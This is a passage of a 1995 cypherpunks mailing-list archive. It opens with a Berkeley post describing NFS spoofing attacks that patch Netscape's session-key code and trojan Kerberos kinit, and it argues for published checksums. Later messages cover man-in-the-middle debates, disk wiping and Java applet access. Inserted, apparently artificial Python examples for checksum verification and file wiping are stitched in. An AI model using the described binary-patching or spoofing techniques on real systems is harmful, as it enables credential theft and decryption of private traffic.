on this task, while the fileserver is certainly servicing requests from many
clients, it stands a very good chance of winning the race. We have observed
that the attacking software wins the race a large fraction of the time.

Given this ability it becomes possible to compromise the security features of
any executable loaded from the network. We have examined the Netscape v1.1N
executable and located the code that selects the session key. By patching only
4 bytes we were able to cause the selection of a predictable session key every
time the browser engages in the SSL protocol. It is then trivial to snoop and
decrypt all traffic from the browser to secure servers, obtaining credit card
numbers or other private information.

Since this is really an attack on the client, it is not limited to the Netscape
browser. On the contrary, it is extremely widely applicable. An appropriate
patch to the Kerberos kinit executable makes possible the compromise of any
passwords entered by users, and therefore all of the authentication facilities
provided by Kerberos.

In many environments, including our own here at UC Berkeley, all the Kerberos
application binaries are served from an NFS server. This represents a major
flaw in security as our attack demonstrates. Having authenticated file services
(kerberized NFS or AFS) is useless if the integrity of the kinit executable
cannot be ensured (most easily by obtaining it from local disk).

However, making local copies of crucial binaries is not sufficient in the face
of a more serious set of variants on the NFS spoofing attack. The spoofing
software can be placed as before, in a position to snoop requests to the NFS
server. As clients issue a lookup filehandle request the spoofing software can
return the handle to a different executable and also forge its attributes. By
tricking users into executing code that is setuid root, unlimited access to the
client's workstation can be obtained easily.

It is possible to mount NFS partitions so that setuid root executables will not
be honored by the client. Still, the spoofing software can make arbitrary NFS
filehandle lookup requests succeed, and substitute a trojan of some sort. The
attacker could cause misspellings of commonly executed commands to appear to
succeed, or could spoof other files that are trusted by the operating system.
For example, the user's .login file is a natural and easy target from which to
leverage further damage.

This implies that it is unsafe to execute any program obtained via an insecure
channel to an NFS server, no matter what the privilege level of the client
user.

Neither is it limited to NFS or file-serving protocols in particular. Protocols
based on TCP, rather than UDP, are just as vulnerable. It is possible to hijack
non-authenticated TCP connections, although it is somewhat more complicated.

Attacks based on spoofing traffic coming from the distribution site of popular
software packages are also possible. Berkeley, for example, is a mirror site for
the Netscape browser. Any student with promiscuous network access on a machine
between the ftp server and the main link to the larger Internet could have
installed similar patching software to patch the huge number of copies of the
binary that were retrieved from server.berkeley.edu.

More mundane attacks based on trojan horses or viruses remain viable today.
These attacks must exploit some other weakness in a system's security to
infiltrate, but once in place they can perform patches to local binaries to
fully compromise a system. Previously such attacks were mostly motivated only by
ego or malice; it is now more valuable to compromise a client invisibly, so
that the user believes the system is secure. Thus, unlike traditional viruses,
the new strains will aim to have no visible effect on the system, thus making
them difficult to detect and easy to spread unintentionally. Our patch of
Netscape has this flavor.

We realize that it is impossible to eliminate all security holes; one can
always question whether it is safe to trust the hardware, or whether outside
channels used for communication of public keys or checksums are truly secure,
etc. Fortunately, in practice it should suffice to handle far less than all of
these risks. We hope to have demonstrated one gaping hole in practical security
today, and to have highlighted the problem of the trusted endpoint.

There is one simple step that we can suggest that would go a long way towards
improving the security of endpoints. Increasing the practice of software
providers widely publishing cryptographically secure checksums of their
executables would be extremely helpful. A small amount of paranoia and care
must be applied to securing the executables used in the verification process. A
read-only floppy disk would be appropriate to hold the verification software,
for example.

We are concerned that security on users' workstations and PCs is currently
insufficient. When real money is at stake, endpoint security must withstand
greater scrutiny. In summary, protecting the communications channel doesn't
help if the endpoints can be subverted. We implemented and discussed several
related attacks that replace legitimate programs by compromised versions. Until
we can trust every program that executes between the time we boot and the time
we finish the secure protocol, we cannot reliably authenticate anything. Today
there is no basis for this trust.

Eric Brewer, brewer@cs.berkeley.edu
Paul Gauthier, gauthier@cs.berkeley.edu
Ian Goldberg, iang@cs.berkeley.edu
David Wagner, daw@cs.berkeley.edu

A copy of this post is available as
http://http.cs.berkeley.edu/~gauthier/endpoint-security.html
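
The checksum step the post recommends, as an added example that is not part of the original post or the authors' software. SHA-256, the `sha256sum`-style manifest format and the sample file names and contents are assumptions; the manifest itself has to reach the verifier over a channel the attacker cannot patch.

```python
"""Verify executables against a vendor-published checksum manifest.

Added example. Assumptions (not from the post): SHA-256 as the hash, a
sha256sum-style manifest ("<hex digest>  <file name>" per line), and the
constructed sample files below.
"""
import hashlib
import hmac
import os
import tempfile

CHUNK = 64 * 1024
HEX = set("0123456789abcdef")


def file_digest(path):
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Return {file name: digest}; reject malformed or ambiguous entries."""
    entries = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: expected '<digest>  <name>'")
        digest, name = parts[0].lower(), parts[1]
        if len(digest) != 64 or not set(digest) <= HEX:
            raise ValueError(f"line {lineno}: not a SHA-256 hex digest")
        # Plain file names only: a manifest must not point outside the tree.
        if name != os.path.basename(name) or name in (".", ".."):
            raise ValueError(f"line {lineno}: unsafe file name {name!r}")
        if name in entries:
            raise ValueError(f"line {lineno}: duplicate entry for {name!r}")
        entries[name] = digest
    return entries


def verify_tree(root, manifest):
    """Classify each file as ok, MISMATCH, MISSING or UNLISTED."""
    results = {}
    for name, expected in manifest.items():
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            results[name] = "MISSING"
        elif hmac.compare_digest(file_digest(path), expected):
            results[name] = "ok"
        else:
            results[name] = "MISMATCH"
    # Files the vendor never listed (for example a substituted helper).
    for name in sorted(os.listdir(root)):
        if name not in manifest:
            results[name] = "UNLISTED"
    return results


def demo():
    """Constructed scenario: a same-size 4-byte change and an extra file."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "browser.bin": bytes(range(256)) * 800,   # constructed contents
            "kinit": b"constructed kinit image" * 100,
        }
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(data)
        # Vendor side: build the manifest from the known-good files.
        manifest_text = "".join(
            f"{file_digest(os.path.join(root, n))}  {n}\n" for n in samples
        )
        manifest = parse_manifest(manifest_text)
        before = verify_tree(root, manifest)

        # Four bytes change in place; the file size stays the same.
        with open(os.path.join(root, "browser.bin"), "r+b") as f:
            f.seek(123_456)
            f.write(b"\x00\x00\x00\x00")
        # A file the vendor never shipped appears beside the real ones.
        with open(os.path.join(root, "kinit.orig"), "wb") as f:
            f.write(b"constructed extra file")
        after = verify_tree(root, manifest)
        return before, after


if __name__ == "__main__":
    for label, result in zip(("before", "after"), demo()):
        print(label, result)
```

As the post notes, the verifier and the manifest are themselves executables and data that must come from trusted media, so a check run with tools loaded over the same unauthenticated file service proves nothing.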




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 9 Oct 95 14:40:16 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Certificate proposal
In-Reply-To: <199510092054.NAA12060@jobe.shell.portal.com>
Message-ID: <199510092134.OAA18662@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The POV I am really arguing against is the one that defines identity to
> be a key, that states that in communicating with a key you are by
> definition communicating with the person you have in mind.  The man in
> the middle attack does not exist because from your point of view the
> entity at the other end of the communication channel is just the MITM
> plus the person you think you are talking to.  This idea has been
> expressed many times by other people in this discussion, and it is this
> which I think is fundamentally flawed and even dangerous because it
> encourages the use of untested keys.  In fact it seems to define away
> the question of whether a key is real or fake.
> 
> Hal
> 


Suppose you have Alice, Bob, and Mallet. (Mallet is the convention for
the MITM, right?)

	Suppose Alice and Bob are communicating privately. Suppose
that Mallet is one of Bob's personalities, because he suffers from
multiple personality disorder.

	How is this different from where Mallet is actually Bob's ISP?

	Even if Alice & Bob were talking in person, privately, Alice
doesn't know that she is also talking to Mallet. My point is that
given no other context, there is *no way* to know for certain that you
are communicating with the person you have in mind.

	Or suppose that Bob is a drug user doing a plea bargain. He
agrees to have his communications monitored via MITM attack to get a
lesser sentence. He buys drugs from Alice and Alice gets caught.

	The thing I am emphasizing here is the necessity to have some
sort of -context- when addressing MITM. In a situation without
context, MITM is not an issue. In a situation -with- context, MITM is
an issue.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 12:35:35 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <9510091934.AA27962@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > OK, but again, what about the man in the middle attack?  Suppose the
 > key that you found that claims to be from Bob is actually not his, but
 > another one created by a man in the middle, such as Bob's malicious
 > ISP?

You have several alternative means of verifying the key:

1) You can meet Bob at a local Pizza Hut and verify the key in person.

2) You can go through a variety of channels to a variety of other
trusted entities and verify with them that they're using the same key
for Bob.

3) You can set up some sorts of communications tests to "probe" for a
MITM situation, perhaps by passing through "seeded" information (data
taggants?).

 > I don't want to overstate the risk of this attack.  It would not be an
 > easy one to mount ... The risks of MITM attacks on public key
 > systems were recognized not long after those systems were proposed.  The
 > problems with fake keys have been discussed for over a decade.
 >
 > Why is this all suddenly irrelevant?  

I don't think it is irrelevant, I just think it's orthogonal to the
issue of whether a certificate for a key<-->entity relationship is
considered to be the key or an adjunct to the key.  I could be wrong,
of course.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Green <alang@rrs.co.za>
Date: Mon, 9 Oct 95 05:36:49 PDT
To: "'cypherpunks@toad.com>
Subject: PC Tools'  PC Secure
Message-ID: <01BA9654.6D1AC480@alang.rrs.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a utility which can decode files encoded with
PC Tools' PC Secure package (version 5, if my memory serves me
correctly). The package came out some 6 years ago.

Thanks
Alan
alang@rrs.co.za





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Mon, 9 Oct 95 06:46:46 PDT
To: cypherpunks@toad.com
Subject: Re: LACC: Account sharing leads to false imprisonment
Message-ID: <199510091346.OAA24239@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Amazing! If I'm allowed to express my opinion!

>Thought you might like another perspective:
>
>...
>>                             A GORRIE STORY
>> 
>> Here's the background: in October of 1994, Hirsh's stepbrother, a U of
>

What I find so amazing is the fascinating arguments exposed here. Let's
see... First, let me say I start from a different point of view.

I see the University as a place for forming people and distributing ideas,
not just the ideas of the "Establishment", but all kinds of ideas. A place for
the free interchange of all ideas and the formation of new persons.

Now, all your message transpires a special horror against the dispersion
of "anti-establishment" ideas. Of things that one could find "disturbing"
from some point of view...

Oh well, I wonder what it would have been if the Arabs in Spain had only
translated the Koran in the middle ages, instead of translating all the
ancient wisdom and preserving it for all of us. Even if it conflicted with
*their* beliefs. It would have been great not to have Aristotle or Plato
at all. Just the Koran.

From your message, it looks like you want instead the Spanish Inquisition back:
if someone distributes strange ideas -anarchist, communist, etc...- that 
person is a risk for the establishment and should be punished. Isn't it?

>Ignorance of the law is no excuse, and being easy to catch doesn't make
>you innocent of a crime.
>
	Yeah, but not showing volunteer to hide, expressing opinions openly,
is not being easy to catch, it's being confident in one's freedom of speech
and on the democratic system to protect it. Even in spite of overzealous
system administrators.

>> facility computer, received a complaint from someone at the University
>> of British Columbia about The Anarchives being posted to net news. The
>> person wanted it stopped.
>
>Interstate transport of stolen (presumably copyrighted) property, possible
>violation of national laws of both nations.  Unauthorized use of the
>computers at the University of British Columbia.
>
	Well, I don't know if that was copyrighted property. But, if it was,
it was up to the (C) holder to decide what actions if any to take. BSD-Unix 
is copyrighted code, but I wouldn't say that all the copies around are illegal,
or stolen.

	Unauthorized use? May I say that if that person asked someone (whomever)
for permission, then it is whoever gave permission (if any) who should be
pursued instead? I guess that if a poor guy is sold the Golden Gate, it is not
that poor guy's fault as much as the "seller's".

	Ah, but that guy was distributing "anarchistic" information: he
must have been pretty bad intentioned then. No one should have "unauthorized
ideas" and even less dare to distribute or share them. I see.

	Great that if someone complains about the distribution of 'X' kind
of ideas there's always a willing sysadmin to hunt the witch instead of
defending freedom of speech. Great.
 
>> have different last names, Gorrie concluded a larger hacker conspiracy
>> was afoot.
>
>Reasonable assumption.  The only way to find out different would be to
>violate the users' privacy by reading their mail, etc.
>
	What? May I suggest that, if the account has an owner, and a system
manager, and all that, those people should be asked prior to jumping to
conspiracy theories? The same kind of reasoning led many innocents to die
with the Spanish Inquisition: hey, they were plotting with the devil against
god laws. Sorry, but I think a phone call to the implicated persons can
easily clear all those doubts without "electronic surveillance" as you propose.

>Collected possible evidence.  A good idea.  Alerting potential criminals
>
	Yeah. I suppose that if they were expressing disturbing ideas, they
were "potential criminals"... What else could they possibly be?

>If he turned out to be a terrorist who was planning to blow up a
>building, you would have called this a tremendous piece of police work,
>they could have written a million-selling book, and you would hail the
>sysadmin as a computer age hero.
>
	Great! I guess that prettily summarizes all: "if" he had turned to
be a "fill in your fears here". Just the same as it was with the Inquisition,
if they were good guys they shouldn't fear torture or dying for God. And it
was better to torture innocents than allowing any "potential bad guy" to get
along.

>So Hirsh agreed that he had been illegally using the computer system
>and the case was settled with a monetary fine.
>
	I bet so. Under torture many innocents also confessed. And faced with
a multimillion dollar trial which, if you can't afford it, will take you to
jail (which can be a real torture), I guess that most innocents will prefer
to go along with a smaller fine.

	It's often better to be alive and free than being the dildo of a
homosexual homicidal maniac in jail. Or visiting the dungeons of the
Inquisition. Of course, if instead of distributing 'X' files he had just
killed his wife and her lover, and were multimillionaire, it would have
been quite different. Wouldn't it?

>> After subjecting Hirsh to complete and devastating public humiliation,
>> U of T was now pleading for discretion.
>
>After Hirsh broke the law, he is trying to get even for being caught by
>harassing the people who caught him.
>
	So, after one person was faced with a humongous bill, disproportionate,
faced with an expensive trial he couldn't afford and forced into an
agreement that's being sold as a confession, and being publicly given a
walk around the city dressed as a damned heretic, he shouldn't have even the
right to complain.

	Obvious. We don't want the faith in the Inquisition to diminish, do we?

				---

Look, I don't really know about the case. But I do really understand one thing:
if this guy hadn't posted what some person considered were "pernicious ideas"
he would have never been tracked down, vilipended and taken to trial.

I don't care whether he was using public resources for something they shouldn't
be. That's something else to be discussed. Is it wrong to use a University
to spread ideas, specially when the mainstream media avoid them? I won't
comment on that.

But that someone can start a witch hunt 'cos some other one is posting some 
special kind of information... Let's say, I can't consider that justification
enough.

So. I think you have made a great point for the defense of cryptography: if 
we want to have free thought and free speech, and avoid a new Inquisition, 
that's the only way. But I'm sure that if these guys had encrypted their 
messages that would have been taken more as a demonstration of their *evil*
purposes.

After all, if they had nothing to fear, why hide? Why avoid torture? But they
didn't hide, and we have seen... yes. Long life to thought control!

				jr
--
	These opinions are mine and only mine. Hey man, I saw them first!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J.E. Davidow" <jed@home.interaccess.com>
Date: Mon, 9 Oct 95 12:52:30 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510091947.OAA23150@thymaster.interaccess.com>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Oct 95 at 13:59, dmandl@panix.com wrote regarding Re: PC disk 
wipe software:

> On Mon, 9 Oct 1995, Perry E. Metzger wrote:
> 
> > I thought I'd ask here, since its related to a lot of the stuff
> > people have written for the PC platform in these parts. I need to
> > securely wipe a bunch of data from an MS-DOS hard drive, so that
> > it can't be recovered. Are there any readily available utilities
> > for this? Will any of them selectively erase only data that isn't
> > allocated to existing files?
> > 
> > Perry

There are several file, directory and/or disk erasing utilities on 
the web and commercial area today. 

Shred is located on WEB in some of the Simtel Libraries. It will not 
only delete the file from the directory, but it writes zeros over the 
data itself, including all of the fragments left at the end of the 
file's cluster. It also will write over the free space left on the 
disk as well. It performs this operation only once per execution.

Another "wipe" software is "Real Deal.zip".  Its virtue is that it
writes a series of patterns to the disk depending upon the level of
security you request. It can remain memory resident, intercepting all
DOS delete requests and write over at least 5 times with different
patterns the data you're deleting. Watch how much longer a delete takes
if you're at the "Real Dewd" level. There are a couple of utilities from
Norton, etc. that will perform a higher level of wiping. Including
the entire disk, directories, etc. They will write several more times
than either RealDeal.zip (Real Delete) or Shred.

The last time I saw, the government 'standard' for "wiping" its own
sensitive data was at least fifteen times with different patterns. How
secure your erased disk will stand up to a concerted effort by law
enforcement, NSA or someone truly looking for what's on your disk
remains questionable at best. But to the average person either Shred or
RealDeal is good enough to keep your wife's attorney, your roommate,
co-worker or your girlfriend out of your personal communiqués.

Remember too, that word processors and other software write all over
your disk and that it's probable that fragments of data that you wish to
delete are attached to or in other files.

J.E. Davidow
jed@interaccess.com
Signed JEDKEY.asc

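
The overwrite-then-delete behaviour described in the message above, as an added sketch for a single file; it is not code from Shred, Real Delete or the poster, and it does not cover wiping free space. The pass patterns, the 4096-byte cluster size and the function names are assumptions.

```python
"""Overwrite-then-delete for one file, with cluster slack included.

Added example. Assumptions (not from the message or from either tool):
the pass patterns, the 4096-byte cluster size and the function names.
"""
import os
import tempfile

# Constructed pass patterns: zeros, ones, alternating bits; None = random.
PATTERNS = [b"\x00", b"\xff", b"\xaa", b"\x55", None]
BLOCK = 1 << 16


def wipe_file(path, passes=1, cluster=4096, remove=True):
    """Overwrite path in place `passes` times, then optionally delete it.

    The length is rounded up to a whole cluster so that the slack between
    end-of-file and the end of the last cluster is overwritten as well.
    Returns the number of bytes written per pass.
    """
    size = os.path.getsize(path)
    padded = -(-size // cluster) * cluster      # ceiling to cluster size
    with open(path, "r+b") as f:
        for i in range(passes):
            pattern = PATTERNS[i % len(PATTERNS)]
            f.seek(0)
            remaining = padded
            while remaining:
                n = min(remaining, BLOCK)
                f.write(os.urandom(n) if pattern is None else pattern * n)
                remaining -= n
            # Push this pass to the device before starting the next one,
            # otherwise only the last pattern may ever reach the disk.
            f.flush()
            os.fsync(f.fileno())
    if remove:
        os.remove(path)
    return padded


def demo():
    """Constructed run: two passes kept for inspection, then a real wipe."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "letter.txt")
        with open(path, "wb") as f:
            f.write(b"constructed sample text " * 300)   # 7200 bytes
        written = wipe_file(path, passes=2, remove=False)
        with open(path, "rb") as f:
            leftover = f.read()
        wipe_file(path, passes=1)                        # zeros, then delete
        return written, leftover, os.path.exists(path)


if __name__ == "__main__":
    written, leftover, still_there = demo()
    print(written, set(leftover), still_there)
```

In-place overwriting only reaches the old data on file systems that rewrite the same blocks, as FAT does; journaling or copy-on-write file systems and flash wear-levelling can leave earlier copies elsewhere on the device.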




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 9 Oct 95 13:01:02 PDT
To: owner-cypherpunks@toad.com
Subject: Re: netscape mail starts java attachments upon get new mail...
Message-ID: <9510091958.AA23589@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>As far as I know Java apps can only make network connections to the
>IP address they were loaded from.

What part of the state of my machine can they access and send out
to the "home port"?  Can they read /etc/passwd, make NIS requests,
etc?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 13:01:48 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <199510082019.QAA15164@book.hks.net>
Message-ID: <Pine.SUN.3.91.951009155445.24837A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 8 Oct 1995, Lucky Green wrote:


> Let me illustrate this with an example. During my visit to Dachau
> Concentration Camp, I saw original lab notebooks of experiments designed
> to increase the survival rate of pilots downed above the cold waters of the
> North Sea. A noble cause.
 
Let me illustrate this with an example. During my visit to the Center 
for Disease Control in Atlanta, I saw original lab notebooks of experiments
designed to cure AIDS, Hanta virus, etc. A noble cause.


But all of this noble research was obtained by holding the entire 
population of a nation in thrall.  These people were threatened with 
death if they didn't support this research.  Armed men herded resisters 
into camps guarded by high walls and barbed wire.

All government research Nazi or whatever is soaked in the blood of 
millions.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Klaus <cklaus@iss.net>
Date: Mon, 9 Oct 95 13:06:30 PDT
To: cypherpunks@toad.com
Subject: Announcement: Alert Mailing List
Message-ID: <199510092303.QAA16855@iss.net>
MIME-Version: 1.0
Content-Type: text/plain



Announcing a new security mailing list - The Alert.

The Alert will be covering the following topics:

	- Security Product Announcements
	- Updates to Security Products
	- New Vulnerabilities found
	- New Security Frequently Asked Question files.
	- New Intruder Techniques and Awareness

To join, send e-mail to request-alert@iss.net and, in the text of your message
(not the subject line), write:


        subscribe alert

To remove, send e-mail to request-alert@iss.net and, in the text of your message
(not the subject line), write:

        unsubscribe alert

This is a moderated list in the effort to keep the noise to a minimum and
provide quality security information.

If your site is interested in network security, we put out several
FAQs (Frequently Asked Questions) that cover the following main areas
of topic:

	Vendor Contacts
	  - Who the security contacts are at IBM, HP, Dec, Motorola, etc.
	  - Web page at:  http://iss.net/iss/vendor.html

	Patches
	  - List of all security related patches categorized by OS type.
	  - Web page at: http://iss.net/iss/patch.html

	Compromise
	  - Check list of things to do if your machines are compromised.
	  - Web page at: http://iss.net/iss/compromise.html

	Anonymous FTP Security
	  - How to correctly set up FTP and check for vulnerabilities.
	  - Web page at: http://iss.net/iss/anonftp.html

	Sniffers
	  - What they are. How they work. How to detect them. And solutions.
	  - Web page: http://iss.net/iss/sniff.html

	Security Mailing Lists
	  - A comprehensive list of security mailing lists.
	  - Web page: http://iss.net/iss/maillist.html


If possible, it might be a good idea for you to add links to the above
web pages on your own Web server and point people who need to know
some of the network security issues to the web page.  It is
possible to point to all of the FAQ pages at:

	http://iss.net/iss/faq.html

-- 
Christopher William Klaus	     Voice: (770)441-2531. Fax: (770)441-2431
Internet Security Systems, Inc.            "Internet Scanner lets you find
2000 Miller Court West, Norcross, GA 30071   your network security holes 
Web: http://iss.net/  Email: cklaus@iss.net   before the hackers do."



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 9 Oct 95 15:07:10 PDT
To: cypherpunks@toad.com
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <Pine.SOL.3.91.951009160553.1148B-100000@welchlink.welch.jhu.edu>
Message-ID: <199510092206.QAA07357@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



C.J. Leonard writes --

> On Mon, 9 Oct 1995, Duncan Frissell wrote:
> > 
> > All government research Nazi or whatever is soaked in the blood of 
> > millions.
> 
> Acknowledgements:
> CJL is supported in part by NIH grants ES05777 and CA61949.

I'm paid by the DOE. Constantly having to get the upholstery in my Bronco 
cleaned. (Don't do this at home, kids. Government research is a messy
business.)


                                 -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 14:15:11 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510091926.MAA08047@infinity.c2.org>
Message-ID: <9510092114.AA24726@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > >just alice. From Bob's perspective, Alice is really an alias for
 > >ISP+Alice. (The same goes for Alice in the other direction.)
 > 
 > What difference does it make?  I'll tell you.  It means that their
 > conversation is not private!  It means that their cryptography is
 > useless, that it has failed.

But if by all means available Bob and Alice satisfy themselves that
their conversation *is* secure, then (until they're proven wrong) it
might as well be.  They have satisfied themselves *at least* that
their messages are in fact encrypted at some point, just as if they
walked into a room, looked around, and satisfied themselves that there
are no hidden microphones.  I don't see how you can ever do any better
than this if you're willing to imagine arbitrarily powerful
men-in-the-middle.

 > This is not a useful or appropriate way to think of the world, IMO.  If
 > you do this, then from your perspective people become bafflingly
 > unreliable.  I wrote all about this before.

Gee, in my reality people already *are* bafflingly unreliable.  (You
must not be watching enough afternoon trash talk shows.)

 > Try to think of it not in relativistic or epistemological terms, but
 > rather look at it in terms of reality.  The real world exists, and in it
 > exist real people.  We can agree on this much, right?  Two of these
 > people want to communicate securely.  That is not such a stretch of the
 > imagination, is it?  By "communicate securely" I mean they exchange
 > information in such a way that other people don't receive it.

What, however, is the real difference between the MITM scenario in a
purely electronic relationship, and a "phony personality in the
middle" attack on a "flesh" relationship?  You *think* you're working
with a realtor to buy a house, but in fact it's a con artist that
betrays your trust and rips you off.  You *think* you've found the
love of your life, but in reality it's just somebody who wants to use
you for sex.  There are no guarantees.

Let me ask this:  how do you *guarantee* that you're having a truly
private in-the-flesh correspondence with a person?  And, having done
that, how do you *guarantee* that the other person will behave in an
absolutely trustworthy fashion?

 > Now surely it is clear that with this definition of the problem,
 > approaches which redefine people to mean people+eavesdroppers are not
 > responsive.  Perhaps the motivation to do so is simply the belief that
 > the problem is not solvable as stated.  If so, I'd like to hear someone
 > say this.

I certainly don't know how to solve it, but I wouldn't trust me if I
were you :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 16:17:41 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <21628.9510092240@exe.dcs.exeter.ac.uk>
Message-ID: <199510092316.QAA09588@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


It occurs to me that perhaps I have been missing a point here when people
argue that having a "man in the middle" is not that different from
various forms of secure communication, such as where Bob has multiple
personalities or is a committee.  I have been taking this to mean that we
should therefore not worry about MITM attacks, which seems crazy to me.

Instead perhaps this was meant as a "reductio ad absurdum" argument for
why MITM attacks cannot be prevented in the scenario where people have no
out-of-band contact.  Anything which could detect and prevent MITM
attacks could, by this analogy, detect whether Bob had multiple
personalities.  Since the latter is obviously impossible, the former must
be as well.  Hence the problem has no solution and we should not
waste much time on it.

I don't fully agree with this but at least it is not as bizarre as the
first interpretation.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 9 Oct 95 13:27:58 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <9510091958.AA23589@sulphur.osf.org>
Message-ID: <QAA01714.199510092027@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510091958.AA23589@sulphur.osf.org>, Rich Salz writes:
>>As far as I know Java apps can only make network connections to the
>>IP address they were loaded from.
>
>What part of the state of my machine can they access and send out
>to the "home port"?  Can they read /etc/passwd, make NIS requests,
>etc?

As far as I know Java Applets either can't do file I/O, or can only
do it in a small area of the file namespace that you set aside for it
(like ~/java-data).  I don't recall any classes that let you make local
NIS requests.  (however this does imply that if you set up a Java Applet
writable area so that you can use the nifty Java rolodex, that other
Java applets could damage that data or send copies to "home base" - I
don't know if there is any finer-grained access, and I haven't yet been
able to do more than _read_ all the Java docs from Sun.  All theory, no
experience.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Mon, 9 Oct 95 13:32:30 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <Pine.SUN.3.91.951009155445.24837A-100000@panix.com>
Message-ID: <Pine.SOL.3.91.951009160553.1148B-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Duncan Frissell wrote:

> 
> On Sun, 8 Oct 1995, Lucky Green wrote:
> 
> 
> > Let me illustrate this with an example. During my visit to Dachau
> > Concentration Camp, I saw original lab notebooks of experiments designed
> > to increase the survival rate of pilots downed above the cold waters of the
> > North Sea. A noble cause.
>  
> Let me illustrate this with an example. During my visit to the Center 
> for Disease Control in Atlanta, I saw original lab notebooks of experiments
> designed to cure Aids, Hanta virus, etc. A noble cause.
> 
> But all of this noble research was obtained by holding the entire 
> population of a nation in thrall.  These people were threatened with 
> death if they didn't support this research.  Armed men herded resisters 
> into camps guarded by high walls and barbed wire.
> 
> All government research Nazi or whatever is soaked in the blood of 
> millions.
> 
> DCF
> 

Deep thinking Duncan, government bad, me good. . . . . . 

I presume in your moral superiority you also refuse to use public roads 
and bridges, purchase your food supplies on the black market to ensure 
that they could not possibly have been USDA inspected, and in every other 
way endeavor to never eat the fruit of the poisoned tree that is the USGovt.
What a heap of self-righteous horseshit.  

Just call me a modern Mengele, and excuse me while I go bathe in the 
blood of millions. . . . .

Acknowledgements:
CJL is supported in part by NIH grants ES05777 and CA61949.


C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
